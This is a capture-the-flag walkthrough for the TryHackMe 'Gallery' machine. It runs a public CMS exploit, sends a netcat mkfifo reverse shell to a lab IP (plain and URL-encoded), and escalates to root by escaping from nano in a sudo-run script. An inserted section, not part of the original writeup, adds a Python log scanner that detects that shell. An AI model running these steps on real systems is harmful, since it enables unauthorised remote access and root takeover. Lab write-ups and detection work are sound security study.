TryHackMe: Gallery

Al1z4deh:~# echo "Welcome"
Apr 18, 2022

Today we will take a look at TryHackMe: Gallery. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Question: How many ports are open?

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.157.45

Question: What’s the name of the CMS?

Answer: S***** I**** G******

I searched for a suitable exploit and found it.

Let’s exploit.

Command: locate 50214.py

Command: searchsploit -m /usr/share/exploitdb/exploits/php/webapps/50214.py

Command: python 50214.py

Get Reverse Shell

Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f

But first let’s encode

Command: rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.8.223.65%204242%20%3E%2Ftmp%2Ff%0A
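Seen from the defender's side, the encoded command above is easy to spot once request targets are percent-decoded. The following is an added example, not part of the original writeup: it scans access-log lines for the mkfifo / sh -i / nc combination and decodes repeatedly so a double-encoded copy is caught too. The log format, path, parameter name and addresses are constructed placeholders, and the function names are hypothetical.

```python
import re
from urllib.parse import quote, unquote_plus

# Indicators from the command above: a named pipe, an interactive shell, netcat.
INDICATORS = {
    "mkfifo": re.compile(r"\bmkfifo\s+/\S+"),
    "interactive_shell": re.compile(r"/bin/(?:ba)?sh\s+-i\b"),
    "netcat": re.compile(r"\b(?:nc|ncat|netcat)\s+\S+\s+\d{1,5}\b"),
}

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def request_target(log_line):
    """Return the request target from a combined-format access log line."""
    m = re.search(r'"(?:GET|POST|PUT|HEAD) (\S+) HTTP/[\d.]+"', log_line)
    return m.group(1) if m else None

def scan(log_lines, threshold=2):
    """Return (line_number, matched_indicator_names) for suspicious requests."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        target = request_target(line)
        decoded = fully_decode(target) if target else ""
        names = sorted(k for k, rx in INDICATORS.items() if rx.search(decoded))
        if len(names) >= threshold:
            hits.append((n, names))
    return hits

# Constructed sample log: path, parameter name and addresses are placeholders.
CMD = "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.1 4242 >/tmp/f"
LINE = '198.51.100.7 - - [18/Apr/2022:10:00:0{}] "GET {} HTTP/1.1" 200 512'
SAMPLE = [
    LINE.format(1, "/index.php?page=home"),
    LINE.format(2, "/example.php?cmd=" + quote(CMD, safe="")),
    LINE.format(3, "/example.php?cmd=" + quote(quote(CMD, safe=""), safe="")),
    LINE.format(4, "/search.php?q=netcat+tutorial"),
]

if __name__ == "__main__":
    for n, names in scan(SAMPLE):
        print(f"line {n}: {', '.join(names)}")
```

Requiring at least two indicators keeps a lone keyword, such as the search query on sample line 4, from raising an alert.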

Enter these commands after receiving the Reverse Shell

Command: script /dev/null -c bash

Command: export TERM=xterm

Command: ctrl+z

Command: stty raw -echo ; fg

Command: reset

Let’s enumerate the machine with linpeas.sh.

Here we found the necessary credentials.

Let’s change the user.

Command: su mike

Privilege Escalation

Let’s look at the file rootkit.sh

Here we can use nano to get a shell. Let’s take a look at this.

Command: sudo -u root /bin/bash /opt/rootkit.sh

Command: read

Command: CTRL+R

Command: CTRL+X

Command: reset; sh 1>&0 2>&0

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”
